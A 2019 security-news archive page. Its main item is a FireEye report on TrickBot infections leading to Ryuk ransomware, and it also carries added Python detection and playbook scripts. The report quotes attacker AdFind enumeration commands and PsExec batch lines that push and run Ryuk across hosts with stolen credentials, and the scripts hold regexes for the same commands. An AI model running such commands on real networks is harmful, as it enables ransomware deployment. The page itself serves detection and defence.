Daily Archives: January 10, 2019

What is a firewall?

You’ve probably heard the word “firewall” a few times in recent years. There was even a 2006 Hollywood movie of the same name starring Harrison Ford, Paul Bettany and Virginia Madsen.

But what is a firewall, and why do they matter?

Keeping the bad guys out

At the most basic level, a firewall is a system that prevents unauthorised access to a network. The firewall acts like a bouncer at the entrance to the network, checking the identification of everyone who tries to enter. Any unauthorised access attempt is blocked automatically.

How does a firewall work?

Before you can properly understand why firewalls matter, you first need to understand a tiny bit about how data is sent between computers.

Say you email a document to a colleague. Your computer splits the document into tiny pieces called packets, which are then sent one at a time to your colleague's computer. Each packet contains additional information that tells the recipient’s computer how to rebuild the document from the packets – and where the packets are coming from. This whole process can be completed in a matter of seconds.

Network data transfers aren’t foolproof though. Packets can get corrupted or lost during transfer. Or they can be intercepted and modified by hackers.

A firewall adds an important layer of protection into the data transfer mechanism. The firewall sits between your computer and the recipient’s, checking every packet that passes through. Any network traffic that has been faked, is coming from an unauthorised or unrecognised source, or is otherwise suspicious is blocked automatically.

The firewall does a lot more besides too. It monitors all network traffic, preventing hackers from breaking into your computer or other internet-connected devices.

Why do firewalls matter?

In a business environment, the firewall is installed at the edge of the network; all network traffic has to pass through the firewall, and is analysed in transit. And the same is true of application firewalls like those included with Panda Dome that are installed on home computers.

Effective network security works on the principle of blocking suspicious traffic before it reaches your computer. In a corporate network, that means stopping hackers before they can access the network. At home, you need to drop/block bad network traffic before it can reach the data stored on your computer.

A firewall is not the same as antivirus – it does not check to see whether incoming packets contain malware. But it does automatically block the most suspicious network traffic to keep criminals out. Like antimalware systems, however, a good firewall is also regularly updated so that it is capable of blocking the latest threats and suspicious activities.

And this automated checking is an important tool for raising the overall level of protection for your home computer and data.

To learn more about firewalls, please take a look at the Panda knowledgebase. And if you’d like to protect your computer with a firewall now, please download a free trial of Panda Dome Security.


The post What is a firewall? appeared first on Panda Security Mediacenter.

Big Surveillance in the Big Easy

A push for public safety in New Orleans led to the creation of its Real-Time Crime Center, which is improving relations between citizens, business owners and police, and saving law enforcement thousands of man-hours every year.

If you wanna learn from the IT security blunders committed by hacked hospital group, here’s some weekend reading

Database intrusion should not have succeeded, probe finds, but...

The theft of 1.5 million patient records, including those of Singapore's Prime Minister, from the city state's SingHealth hospital group by hackers could probably have been stopped had the IT department not been so useless, an inquiry has found.…

The Top 5 Vendor-Neutral Cloud Security Certifications of 2019

Many organizations migrate to the cloud because of increased efficiency, data space, scalability, speed and other benefits. But cloud computing comes with its own security threats. To address these challenges, companies should create a hybrid cloud environment, confirm that their cloud security solution offers 24/7 monitoring and multi-layered defenses as well as implement security measures […]

The post The Top 5 Vendor-Neutral Cloud Security Certifications of 2019 appeared first on The State of Security.

Dozens of .gov HTTPS certs expire, webpages offline, FBI on ice, IT security slows… Yup, it’s day 20 of Trump’s govt shutdown

Hackers may be rubbing their hands with glee

The IT impact of the ongoing partial US federal government shutdown has begun to show up in the form of degraded computer security. According to internet services biz Netcraft, more than 80 TLS certificates used on .gov websites have expired and have not been renewed.…

A Nasty Trick: From Credential Theft Malware to Business Disruption

FireEye is tracking a set of financially-motivated activity referred to as TEMP.MixMaster that involves the interactive deployment of Ryuk ransomware following TrickBot malware infections. These operations have been active since at least December 2017, with a notable uptick in the latter half of 2018, and have proven to be highly successful at soliciting large ransom payments from victim organizations. In multiple incidents, rather than relying solely on built-in TrickBot capabilities, TEMP.MixMaster used EMPIRE and RDP connections to enable lateral movement within victim environments. Interactive deployment of ransomware, such as this, allows an attacker to perform valuable reconnaissance within the victim network and identify critical systems to maximize their disruption to business operations, ultimately increasing the likelihood an organization will pay the demanded ransom. These operations have reportedly netted about $3.7 million in current BTC value.

Notably, while there have been numerous reports attributing Ryuk malware to North Korea, FireEye has not found evidence of this during our investigations. This narrative appears to be driven by code similarities between Ryuk and Hermes, a ransomware that has been used by APT38. However, these code similarities are insufficient to conclude North Korea is behind Ryuk attacks, as the Hermes ransomware kit was also advertised for sale in the underground community at one time.

It is important to note that TEMP.MixMaster is solely a reference to incidents where we have seen Ryuk deployed following TrickBot infections and that not all TrickBot infections will lead to the deployment of Ryuk ransomware. The TrickBot administrator group, which is suspected to be based in Eastern Europe, most likely provides the malware to a limited number of cyber criminal actors to use in operations. This is partially evident through its use of “gtags” that appear to be unique campaign identifiers used to identify specific TrickBot users. In recent incidents investigated by our Mandiant incident response teams, there has been consistency across the gtags appearing in the configuration files of TrickBot samples collected from different victim networks where Ryuk was also deployed. The uniformity of the gtags observed across these incidents appears to be due to instances of TrickBot being propagated via the malware’s worming module configured to use these gtag values.

Currently, we do not have definitive evidence that the entirety of TEMP.MixMaster activity, from TrickBot distribution and operation to Ryuk deployment, is being conducted by a common operator or group. It is also plausible that Ryuk malware is available to multiple eCrime actors who are also using TrickBot malware, or that at least one TrickBot user is selling access to environments they have compromised to a third party. The intrusion operations deploying Ryuk have also been called GRIM SPIDER.

TrickBot Infection Leading to Ryuk Deployment

The following is a summary of tactics observed across incident response investigations where the use of TrickBot preceded distribution of Ryuk ransomware. Of note, due to the interactive nature of Ryuk deployment, the TTPs leading to its execution can vary across incidents. Furthermore, in at least one case, artifacts related to the execution of TrickBot were collected but there was insufficient evidence to clearly tie observed Ryuk activity to the use of TrickBot.

Initial Infection

The initial infection vector was not confirmed in all incidents; in one case, Mandiant identified that the attackers leveraged a payroll-themed phishing email with an XLS attachment to deliver TrickBot malware (Figure 1). The campaign is documented on this security site. Data from FireEye technologies shows that this campaign was widely distributed primarily to organizations in the United States, and across diverse industries including government, financial services, manufacturing, service providers, and high-tech.

Once a victim opened the attachment and enabled macros, it downloaded and executed an instance of the TrickBot malware from a remote server. Data obtained from FireEye technologies suggests that although different documents may have been distributed by this particular malicious spam run, the URLs from which the documents attempted to retrieve a secondary payload did not vary across attachments or recipients, despite the campaign’s broad distribution both geographically and across industry verticals.

Subject: FW: Payroll schedule
Attachment: Payrollschedule.xls

Pay run summary report and individual payslips.
Kind Regards,
Adam Bush
The contents of this email message and any attachments are intended solely for the addressee(s) and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the intended recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the intended recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.

Figure 1: Email from a phishing campaign that downloaded TrickBot, which eventually led to Ryuk

Persistence and Lateral Movement

When executed, TrickBot created scheduled tasks on compromised systems to execute itself and ensure persistence following system reboot. These instances of TrickBot were configured to use their network propagation modules (sharedll and tabdll) that rely on SMB and harvested credentials to propagate to additional systems in the network. The number of systems to which TrickBot was propagated varied across intrusions from fewer than ten to many hundreds.

Dwell Time and Post-Exploitation Activity

After a foothold was established by the actors controlling TrickBot, a period of inactivity sometimes followed. Dwell time between TrickBot installation and Ryuk distribution varied across intrusions, but in at least one case may have been as long as a full year. Despite this long dwell time, the earliest reports of Ryuk malware only date back to August 2018. It is likely that actors controlling TrickBot instances used to maintain access to victim environments prior to the known availability of Ryuk were monetizing this access in different ways. Further, due to the suspected human-driven component to these intrusion operations, we would expect to commonly see a delay between initial infection and Ryuk deployment or other post-exploitation activity, particularly in cases where the same initial infection vector was used to compromise multiple organizations simultaneously.

Once activity restarted, the actors moved to interactive intrusion by deploying Empire and/or leveraging RDP connections tunneled through reverse-shells instead of relying on the built-in capabilities of TrickBot to interact with the victim network. In multiple intrusions TrickBot's reverse-shell module (NewBCtestDll) was used to execute obfuscated PowerShell scripts which ultimately downloaded and launched an Empire backdoor.

Variations in Ryuk Deployment Across Engagements

Post-exploitation activity associated with each Ryuk incident has varied in historical and ongoing Mandiant incident response engagements. Given that collected evidence suggests Ryuk deployment is managed via human-interactive post-exploitation, variation and evolution in methodology, tools, and approach over time and across intrusions is expected.

The following high-level steps appear common across most incidents into which we have insight:

  • Actors produce a list of target systems and save it to one or multiple .txt files.
  • Actors move a copy of PsExec, an instance of Ryuk, and one or more batch scripts to one or more domain controllers or other high privilege systems within the victim environment.
  • Actors run batch scripts to copy a Ryuk sample to each host contained in .txt files and ultimately execute them.

Some of the notable ways Ryuk deployment has varied include:

  • In one case, there was evidence suggesting that actors enumerated hosts on the victim network to identify targets for encryption with Ryuk, but in multiple other cases these lists were manually copied to the server that was then used for Ryuk distribution without clear evidence available for how they were produced.
  • There have been multiple cases where TrickBot was deployed broadly across victim environments rather than being used to maintain a foothold on a small number of hosts.
  • We have not identified evidence that Empire was used by the attackers in all cases and sometimes Empire was used to access the victim environment only after Ryuk encryption had started.
  • In one case, the attackers used a variant of Ryuk with slightly different capabilities accompanied by a standalone .bat script containing most of the same taskkill, net, and sc commands normally used by Ryuk to terminate processes and stop services related to anti-virus, backup, and database software.

Example of Ryuk Deployment – Q3 2018

  • Using previously stolen credentials, the attacker logged into a domain controller and copied tools into the %TEMP% directory. Copied tools included AdFind.exe (Active Directory enumeration utility), a batch script (Figure 2), and a copy of the 7-Zip archive utility.
  • Downloaded utilities were copied to C:\Windows\SysWOW64\.
  • The attacker performed host and network reconnaissance using built-in Windows commands.
  • AdFind.exe was executed using the previously noted batch script, which was crafted to pass the utility a series of commands that were used to collect information about Active Directory users, systems, OUs, subnets, groups, and trust objects. The output from each command was saved to an individual text file alongside the AdFind.exe utility (Figure 2).
  • This process was performed twice on the same domain controller, 10 hours apart. Between executions of AdFind the attacker tested access to multiple domain controllers in the victim environment, including the one later used to deploy Ryuk.
  • The attacker logged into a domain controller and copied instances of PsExec.exe, a batch script used to kill processes and stop services, and an instance of Ryuk onto the system.
  • Using PsExec the attacker copied the process/service killing batch script to the %TEMP% folder on hundreds of computers across the victim environment, from which it was then executed.
  • The attacker then used PsExec to copy the Ryuk binary to the %SystemRoot% directories of these same computers. A new service configured to launch the Ryuk binary was then created and started.
  • Ryuk execution proceeded as normal, encrypting files on impacted systems.

adfind.exe -f (objectcategory=person) > <user_list>.txt
adfind.exe -f objectcategory=computer > <computer_list>.txt
adfind.exe -f (objectcategory=organizationalUnit) > <ou_list>.txt
adfind.exe -subnets -f (objectCategory=subnet) > <subnet_list>.txt
adfind.exe -f "(objectcategory=group)" > <group_list>.txt
adfind.exe -gcb -sc trustdmp > <trustdmp>.txt

Figure 2: Batch script that uses adfind.exe tool to enumerate Active Directory objects

Example of Ryuk Deployment – Q4 2018

  • An instance of the EMPIRE backdoor launched on a system that had been infected by TrickBot. The attacker used EMPIRE’s built-in capabilities to perform network reconnaissance.
  • Attackers connected to a domain controller in the victim network via RDP and copied several files into the host’s C$ share. The copied files included an instance of PsExec, two batch scripts, an instance of the Ryuk malware, and multiple .txt files containing lists of hosts within the victim environment. Many of the targeted hosts were critical systems across the victim environment including domain controllers and other hosts providing key management and authentication services.
  • The attackers then executed the first of these two batch scripts. The executed script used PsExec and hard-coded credentials previously stolen by the actors to copy the Ryuk binary to each host passed as input from the noted .txt files (Figure 3).
  • Attackers then executed the second batch script which iterated through the same host lists and used PsExec to execute the Ryuk binaries copied by the first batch script (Figure 4).

start PsExec.exe @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c COPY "\\<shared_folder>\<ryuk_exe>" "C:\windows\temp\"

Figure 3: Line from the batch file used to copy Ryuk executable to each system

start PsExec.exe -d @C:\<shared_folder>$\<list>.txt -u <domain>\<username> -p <password> cmd /c "C:\windows\temp\<ryuk_exe>"

Figure 4: Line from the batch file used to execute Ryuk on each system
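As an added illustration that is not part of the FireEye post, the following Python script runs simple detection rules over constructed process-creation records modelled on the deployment chain in Figures 2 to 4: AdFind enumeration with the object-category filters, PsExec driven by a host-list file with credentials on the command line, the PSEXESVC service on the receiving side, and execution out of C:\windows\temp. The host names, user names, the file name ryk.exe and the password are placeholders.

```python
import re
from collections import defaultdict

# Constructed process-creation records (host, user, command line) modelled on the
# Q3/Q4 2018 deployment chain above. Not real telemetry; all names are placeholders.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\svc_backup",
     "cmd": r'C:\Windows\SysWOW64\adfind.exe -f (objectcategory=person)'},
    {"host": "DC01", "user": "CORP\\svc_backup",
     "cmd": r'adfind.exe -gcb -sc trustdmp'},
    # Figure 3 style: host list from a .txt, credentials on the command line, COPY to windows\temp
    {"host": "DC01", "user": "CORP\\svc_backup",
     "cmd": r'PsExec.exe @C:\share$\hosts.txt -u CORP\admin -p Winter2018 cmd /c COPY "\\share\ryk.exe" "C:\windows\temp\"'},
    # Figure 4 style: same list, -d, run the copied binary
    {"host": "DC01", "user": "CORP\\svc_backup",
     "cmd": r'PsExec.exe -d @C:\share$\hosts.txt -u CORP\admin -p Winter2018 cmd /c "C:\windows\temp\ryk.exe"'},
    # Receiving side of PsExec on a workstation, then the payload and the process-killing script
    {"host": "WS042", "user": "NT AUTHORITY\\SYSTEM", "cmd": r'C:\Windows\PSEXESVC.exe'},
    {"host": "WS042", "user": "CORP\\admin", "cmd": r'cmd /c "C:\windows\temp\ryk.exe"'},
    {"host": "WS042", "user": "CORP\\admin", "cmd": r'taskkill /IM sqlwriter.exe /F'},
    # Benign activity that must not match
    {"host": "WS100", "user": "CORP\\jdoe", "cmd": r'C:\Program Files\7-Zip\7z.exe a report.zip report.docx'},
]

# Each rule is (name, regex over the command line). Case-insensitive because the
# observed command lines mix AdFind/adfind, PsExec/PSExec and COPY/copy.
RULES = [
    # AdFind run with the object-category, subnet or trust-dump queries from Figure 2
    ("adfind_ad_enum",
     re.compile(r'adfind(\.exe)?\b.*(-f\s+"?\(?objectcategory=|-sc\s+trustdmp|-subnets)', re.I)),
    # PsExec fed a host list via @file, with -u/-p credentials, copying a file (Figure 3)
    ("psexec_hostlist_push",
     re.compile(r'psexec(\.exe)?\b.*@\S+\.txt.*\s-u\s+\S+\s+-p\s+\S+.*\bcopy\b', re.I)),
    # PsExec -d over a host list executing something under windows\temp (Figure 4)
    ("psexec_hostlist_exec_temp",
     re.compile(r'psexec(\.exe)?\b.*-d\s+@\S+\.txt.*windows\\temp\\', re.I)),
    # Any executable launched from C:\windows\temp
    ("exec_from_windows_temp",
     re.compile(r'c:\\windows\\temp\\[^\\"]+\.exe', re.I)),
    # The PsExec service dropped on the remote host
    ("psexec_remote_service", re.compile(r'psexesvc\.exe', re.I)),
    # The taskkill / net stop / sc stop commands Ryuk and its helper .bat use
    ("taskkill_or_stop_service",
     re.compile(r'^(taskkill\b.*\s/f\b|net\s+stop\b|sc\s+stop\b)', re.I)),
]


def evaluate(events):
    """Run every rule over every event; one finding per (event, rule) match."""
    findings = []
    for ev in events:
        for name, pattern in RULES:
            if pattern.search(ev["cmd"]):
                findings.append({"host": ev["host"], "user": ev["user"],
                                 "rule": name, "cmd": ev["cmd"]})
    return findings


def rules_by_host(findings):
    """Map host -> set of rule names that fired there."""
    out = defaultdict(set)
    for f in findings:
        out[f["host"]].add(f["rule"])
    return dict(out)


def staging_hosts(findings):
    """Hosts with both AD enumeration and a PsExec host-list push or exec are the likely
    distribution points (the domain controller in the engagements described above)."""
    push_or_exec = {"psexec_hostlist_push", "psexec_hostlist_exec_temp"}
    return sorted(h for h, rules in rules_by_host(findings).items()
                  if "adfind_ad_enum" in rules and rules & push_or_exec)


if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f['host']:6} {f['rule']:26} {f['cmd'][:70]}")
    print("likely staging hosts:", staging_hosts(evaluate(SAMPLE_EVENTS)))
```

Credentials passed with -u/-p on a PsExec command line are themselves worth alerting on, since they end up in process-creation logs of the staging host.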

Consistency in TrickBot Group Tags

Each individual TrickBot sample beacons to its Command & Control (C2) infrastructure with a statically defined “gtag” that is believed to act as an identifier for distinct TrickBot customers. There has been significant uniformity in the gtags associated with TrickBot samples collected from the networks of victim organizations.

  • The instance of TrickBot identified as the likely initial infection vector for one intrusion was configured to use the gtag ‘ser0918us’.
    • At the time of distribution, the C2 servers responding to TrickBot samples using the gtag ‘ser0918us’ were sending commands to request that the malware scan victim networks, and then propagate across hosts via the TrickBot worming module.
    • It is possible that in some or all cases instances of TrickBot propagated via the malware’s worming module are configured to use different gtag values, specific to the same TrickBot client, designed to simplify management of implants post-exploitation.
  • A significant proportion of TrickBot samples obtained from the victim environments, including in the case where the infection vector was identified as a sample using gtag ‘ser0918us’, had gtags in the below formats. This may suggest that these gtags are used to manage post-exploitation instances of TrickBot for campaigns distributed via gtag ‘ser0918us’ and other related gtags.
    • libxxx (e.g. lib373, lib369)
    • totxxx (e.g. tot373, tot369)
    • jimxxx (e.g. jim373, jim369)
  • The numbers appended to the end of each gtag appear to increment over time, and in some cases multiple samples sharing the same compile time but using different gtags were observed in the same victim environment, though in each of these cases the numbers appended to the end of the gtag matched (e.g. two distinct samples sharing the compile time 2018-12-07 11:28:23 were configured to use the gtags ‘jim371’ and ‘tot371’).
  • The C2 infrastructure hard-coded into these samples overlaps significantly across samples sharing similar gtag values. However, there is also C2 infrastructure overlap between these samples and ones with dissimilar gtag values. These patterns may suggest the use of proxy infrastructure shared across multiple clients of the TrickBot administrator group.
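As an added example (not FireEye's tooling), the following Python code parses gtags of the forms listed above and checks a set of constructed sample records for the two patterns described: distinct samples sharing a compile time and numeric suffix under different prefixes, and C2 endpoints shared across dissimilar gtag families. The sample IDs, most compile times and the documentation-range C2 addresses are constructed; only the jim371/tot371 pair and its compile time come from the text.

```python
import re
from collections import defaultdict
from itertools import combinations

# Constructed TrickBot sample metadata: gtag, compile timestamp and hard-coded C2 list.
# C2 endpoints use documentation address ranges and are not real indicators.
SAMPLES = [
    {"id": "s1", "gtag": "ser0918us", "compiled": "2018-09-10 08:12:01",
     "c2": ["203.0.113.10:443", "203.0.113.11:449"]},
    {"id": "s2", "gtag": "lib369", "compiled": "2018-11-20 14:05:44",
     "c2": ["203.0.113.11:449", "198.51.100.7:449"]},
    {"id": "s3", "gtag": "tot369", "compiled": "2018-11-20 14:05:44",
     "c2": ["198.51.100.7:449"]},
    {"id": "s4", "gtag": "jim371", "compiled": "2018-12-07 11:28:23",
     "c2": ["198.51.100.7:449", "192.0.2.5:443"]},
    {"id": "s5", "gtag": "tot371", "compiled": "2018-12-07 11:28:23",
     "c2": ["192.0.2.5:443"]},
    {"id": "s6", "gtag": "lib373", "compiled": "2018-12-19 09:41:10",
     "c2": ["192.0.2.5:443", "192.0.2.9:443"]},
    {"id": "s7", "gtag": "jim373", "compiled": "2018-12-19 09:41:10",
     "c2": ["192.0.2.9:443"]},
]

GTAG_RE = re.compile(r"^([a-z]+)(\d+)([a-z]*)$")


def parse_gtag(gtag):
    """Split a gtag into (prefix, number, suffix): 'jim371' -> ('jim', 371, ''),
    'ser0918us' -> ('ser', 918, 'us'). Raises ValueError on an unexpected shape."""
    m = GTAG_RE.match(gtag.lower())
    if not m:
        raise ValueError(f"unrecognised gtag format: {gtag!r}")
    prefix, number, suffix = m.groups()
    return prefix, int(number), suffix


def shared_build_pairs(samples):
    """Pairs of samples with the same compile time and gtag number but different prefixes,
    the pattern the post notes for jim371/tot371."""
    pairs = []
    for a, b in combinations(samples, 2):
        pa, pb = parse_gtag(a["gtag"]), parse_gtag(b["gtag"])
        if a["compiled"] == b["compiled"] and pa[1] == pb[1] and pa[0] != pb[0]:
            pairs.append((a["id"], b["id"]))
    return pairs


def number_series(samples):
    """Prefix -> sorted list of numbers seen, to check that they increment over time."""
    series = defaultdict(set)
    for s in samples:
        prefix, number, _ = parse_gtag(s["gtag"])
        series[prefix].add(number)
    return {p: sorted(nums) for p, nums in series.items()}


def shared_c2(samples):
    """C2 endpoints hard-coded into samples from more than one gtag family, which the post
    suggests may be proxy infrastructure shared across TrickBot clients."""
    by_c2 = defaultdict(set)
    for s in samples:
        prefix = parse_gtag(s["gtag"])[0]
        for endpoint in s["c2"]:
            by_c2[endpoint].add(prefix)
    return {c2: sorted(p) for c2, p in by_c2.items() if len(p) > 1}


if __name__ == "__main__":
    print("same-build pairs:", shared_build_pairs(SAMPLES))
    print("number series:", number_series(SAMPLES))
    print("C2 shared across families:", shared_c2(SAMPLES))
```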


Throughout 2018, FireEye observed an increasing number of cases where ransomware was deployed after the attackers gained access to the victim organization through other methods, allowing them to traverse the network to identify critical systems and inflict maximum damage. SamSam operations, which date back to late 2015, were arguably the first to popularize this methodology, and TEMP.MixMaster is an example of its growing popularity with threat actors. FireEye Intelligence expects that these operations will continue to gain traction throughout 2019 due to the success these intrusion operators have had in extorting large sums from victim organizations.

It is also worth highlighting TEMP.MixMaster’s reliance on TrickBot malware, which is more widely distributed, to gain access to victim organizations. Following indiscriminate campaigns, threat actors can profile victims to identify systems and users of interest and subsequently determine potential monetization strategies to maximize their revenue. Various malware families have incorporated capabilities that can aid in the discovery of high-value targets, underscoring the necessity for organizations to prioritize proper remediation of all threats, not only those that initially appear to be targeted.


The authors would like to thank Brice Daniels, Edward Li, Eric Montellese, Sandor Nemes, Eric Scales, Brandan Schondorfer, Martin Tremblay, Isif Ibrahima, Phillip Kealy and Steve Rasch for their contributions to this blog post.

Empowering Security Teams With Threat Intelligence, Automation, and Orchestration

Key Takeaways

  • Security orchestration is the process of automating workflows across an infrastructure of connected applications.
  • When combined with threat intelligence, orchestration can dramatically reduce the human effort required to complete normal security processes such as responding to reported phishing emails, identifying and prioritizing vulnerabilities, and resolving security incidents.
  • Orchestrated incident response leads to faster and more consistent handling of security incidents, reduced reliance on individuals, and a variety of other benefits.
  • The orchestration journey is a long road, but there are significant process and outcome improvements at each stage.
  • Threat intelligence plays a vital role in security orchestration, as it enables automated systems and processes to make decisions (for example, classifying and prioritizing incidents) based on the latest threat insights and data.

Security teams are facing a huge challenge. The volume and complexity of cyberattacks grows every year, and security professionals from all disciplines are being pushed to the limit of their time, skills, and resources.

In recent years, automation and orchestration have become popular with security teams, because (when done properly) they reduce the burden placed on human analysts. So how can organizations begin to improve incident response times and drastically reduce the human effort required to complete security processes?

In this blog, we explain how threat intelligence, automation, and orchestration fit into the security function and what benefits they can provide.

What Is Security Automation and Orchestration?

To kick things off, here are some key definitions:

Automation is the use of technological controls or systems to complete processes that would normally be handled by personnel. While automation was originally limited to simple, repetitive tasks, recent technological advances have made it possible to automate more complex security processes.

Workflows are the step-by-step processes through which a task or series of tasks is completed. In the security world, these are often referred to as “playbooks.”

Finally, orchestration is the process of automating workflows across an infrastructure of connected applications. For example, orchestration in vulnerability management might require API integration of a vulnerability scanner, a threat intelligence solution, and a ticketing system.

When security orchestration is pulled off successfully, it provides a whole host of benefits, including:

  • Freeing human analysts from time-consuming and repetitive tasks
  • Greater consistency in security processes, such as event escalation
  • Quicker results — automated processes are faster than manual processes
  • Reduced staffing and allowing personnel to focus on higher-value tasks

Security Orchestration for Incident Response

Responding to security incidents can be an extremely manual and time-consuming process. In addition to the work required to investigate and remediate an incident, incident response analysts are forced to spend a huge amount of time switching between screens and technologies to access the information and functionality they need to do their jobs.

Naturally, then, security orchestration and automation has potentially huge benefits for incident response teams:

  • Faster Response Times: Orchestrated incident response requires consistent, honed processes, integration across security technologies, and judicious use of automation. This combination enables IT analysts to process incidents in an extremely efficient and consistent manner without needing to repeatedly switch back and forth between technologies.
  • Simpler Workflows: Even the best incident response processes often require complex, multi-step workflows. By automating time-consuming and repetitive tasks, incident response teams can focus their energy on higher-value tasks.
  • Better Cross-Departmental Working: Responding to security incidents often requires input from other departments, like the IT helpdesk, HR, legal, and even marketing or PR. In many cases, automated workflows can drastically improve the process of assigning, tracking, and completing tasks across an organization.
  • Reduced Reliance on Individuals: Even established security teams can expect to see a natural variation in skill levels across different activities. Unfortunately, if you aren’t careful, this can lead to an overreliance on individuals to complete certain incident response tasks. Security orchestration helps mitigate this issue by forcing incident response teams to develop and document strong, consistent processes that help junior personnel develop their skill sets.
  • Enhanced Ability to Identify and Prioritize Serious Threats: When threat intelligence is built into security orchestration, the result is sometimes called “intelligent orchestration.” The inclusion of threat intelligence as part of an API-integrated security function facilitates the automatic identification and prioritization of serious threats, which is crucial in a time-sensitive environment such as incident response.

To understand how an orchestrated incident response function works in practice, consider a simple use case: Your endpoint detection and response (EDR) solution identifies a suspicious process as it attempts to connect to an external server. If such an incident were investigated manually, an analyst would (at the very least) need to:

  • Log a new incident
  • Write and run a SIEM query, pulling all relevant events into a CSV file
  • Identify an MD5 hash for the process and compare it to threat intelligence feeds
  • If the process is confirmed as malicious, create a backup of the affected assets, isolate them from the network, and run an AV scan
  • Update the incident record, attaching all relevant log files

Conservatively, this process could take an analyst 30 minutes to complete, and would need to be done every time a suspicious process is flagged. The orchestrated version of this process — which incorporates threat intelligence and automation — looks similar, but requires almost no input from a human analyst:

  • EDR identifies a suspicious process and an incident is automatically generated
  • The process is compared to threat feeds and prioritized as a serious threat
  • The SIEM is queried, and relevant records are added to the incident
  • IOCs from the incident are compared with threat feeds and confirmed as malicious
  • Based on threat intelligence, the incident is categorized as a malware attack
  • Remediation process begins (creating backups, isolating endpoints, running AV scans)
  • An audit trail is kept automatically

With a version of the process like the one above, if an analyst needs to run additional queries or take further action, they can do so, because they aren’t having to expend all of their time on slow, repetitive processes.
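As an added example that is not Recorded Future's code, the following Python playbook implements the orchestrated flow above against a constructed threat feed and SIEM event store. The hash, host names and addresses are placeholders, and an alert with no intelligence match is routed to an analyst rather than remediated automatically, which is the failure mode the post warns about when the human element is removed.

```python
import hashlib
from dataclasses import dataclass, field
from datetime import datetime, timedelta

# Constructed threat-intelligence feed. The hash is derived from a placeholder string and
# the address is from a documentation range; neither is a real indicator.
BAD_HASH = hashlib.md5(b"constructed-malicious-sample").hexdigest()
THREAT_FEED = {
    "hashes": {BAD_HASH: {"family": "TrickBot", "severity": "high"}},
    "hosts": {"203.0.113.50": {"family": "TrickBot", "severity": "high"}},
}

# Constructed SIEM records: (timestamp, host, event_type, detail).
SIEM_EVENTS = [
    ("2019-01-10T09:58:00", "WS042", "process", "C:\\Users\\jdoe\\AppData\\Roaming\\svchost.exe"),
    ("2019-01-10T09:59:10", "WS042", "network", "203.0.113.50:449"),
    ("2019-01-10T10:00:02", "WS042", "network", "192.0.2.20:443"),
    ("2019-01-10T07:00:00", "WS042", "network", "198.51.100.1:80"),   # outside the lookback window
    ("2019-01-10T09:59:30", "WS007", "network", "203.0.113.50:449"),  # different host, not attached
]


@dataclass
class Incident:
    host: str
    process_hash: str
    priority: str = "low"
    category: str = "unconfirmed"
    events: list = field(default_factory=list)
    iocs: list = field(default_factory=list)
    actions: list = field(default_factory=list)
    audit: list = field(default_factory=list)   # the automatically kept audit trail

    def log(self, step):
        self.audit.append(step)


def query_siem(events, host, at, lookback=timedelta(hours=1)):
    """Step 3 of the orchestrated flow: pull the host's events from the lookback window."""
    start = at - lookback
    return [e for e in events
            if e[1] == host and start <= datetime.fromisoformat(e[0]) <= at]


def extract_iocs(events):
    """Destination addresses from network events, without ports."""
    return sorted({e[3].split(":")[0] for e in events if e[2] == "network"})


def run_playbook(alert, feed=THREAT_FEED, siem=SIEM_EVENTS):
    """Handle one EDR 'suspicious process' alert end to end, mirroring the steps in the post."""
    inc = Incident(alert["host"], alert["md5"])
    inc.log("incident created from EDR alert")

    hit = feed["hashes"].get(alert["md5"])            # compare the process hash to the feed
    if hit:
        inc.log(f"process hash matched feed: {hit['family']}")

    inc.events = query_siem(siem, alert["host"], datetime.fromisoformat(alert["time"]))
    inc.log(f"siem query attached {len(inc.events)} events")

    inc.iocs = [ip for ip in extract_iocs(inc.events) if ip in feed["hosts"]]
    inc.log(f"{len(inc.iocs)} network IOCs confirmed against feed")

    severities = ([hit["severity"]] if hit else []) + [feed["hosts"][ip]["severity"] for ip in inc.iocs]
    if severities:
        inc.priority = "high" if "high" in severities else "medium"
        inc.category = "malware"
        inc.actions = ["snapshot_backup", "isolate_endpoint", "av_scan"]
        inc.log("remediation started: " + ", ".join(inc.actions))
    else:
        # No intelligence match: do not act automatically, hand it to a human.
        inc.actions = ["escalate_to_analyst"]
        inc.log("no intelligence match: routed to analyst queue")

    inc.log("audit trail closed")
    return inc


if __name__ == "__main__":
    inc = run_playbook({"host": "WS042", "md5": BAD_HASH, "time": "2019-01-10T10:00:30"})
    print(inc.category, inc.priority, inc.iocs, inc.actions)
    print("\n".join(inc.audit))
```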

The Evolution of Security Orchestration

While orchestration clearly has applications outside of response-based security disciplines, incident response is a sensible place to start because it’s the point at which most security solutions and processes intersect.

The journey toward a fully orchestrated incident response function is a long road. Fortunately, as each stage of the journey is realized, there are potentially huge advantages in key areas such as improved time taken to detect and respond to security incidents.

Of course, as beneficial as orchestration and automation can be, particularly when combined with threat intelligence, there is one important thing to keep in mind.

Automated and intelligent workflows can dramatically improve efficiency and consistency in security processes, but only if the underlying workflows are well designed. If you move forward with automation and orchestration before you have solid workflows in place, you’ll end up missing things or making serious errors — and nobody will pick them up, because the human element has been removed.

As with all security endeavors, then, it’s important to keep in mind that the order of improvement should be:

People → Processes → Technology

Once you have well-trained personnel and strong processes in place, committing to a program of integration, automation, and orchestration can revolutionize your security program.

The post Empowering Security Teams With Threat Intelligence, Automation, and Orchestration appeared first on Recorded Future.


Google Assistant Is All Stacked Up With Loads Of New Features

Google Assistant is moving forward with a set of eagerly awaited new features and integrations for its users.

Some of these features have been on the demand list of Google Assistant’s users. Let’s check out what the fresh integrations and features are.

Interpreter Mode
Google Home devices will help users hold a conversation in different languages. The ‘Interpreter Mode’ translates in real time and narrates the entire translation out loud; on smart displays the text is also shown on-screen.
Command: “Hey Google, be my Spanish interpreter”

Google Assistant Connect
This is an affordable platform for manufacturers to add Google Assistant to their products. It can be extended to new devices through the existing smart home platforms.
One example is an e-ink display that shows the calendar and weather, with the information delivered via a smart speaker already present in the house.

This program could be accessed by the manufacturers in late 2019.

Google Maps Integration
At last, Google Maps and Google Assistant are joining up. Users will soon be able to share Maps data such as their ETA with friends.
The Assistant will also handle replying to text messages, adding new destinations, searching for places along the route, and more.
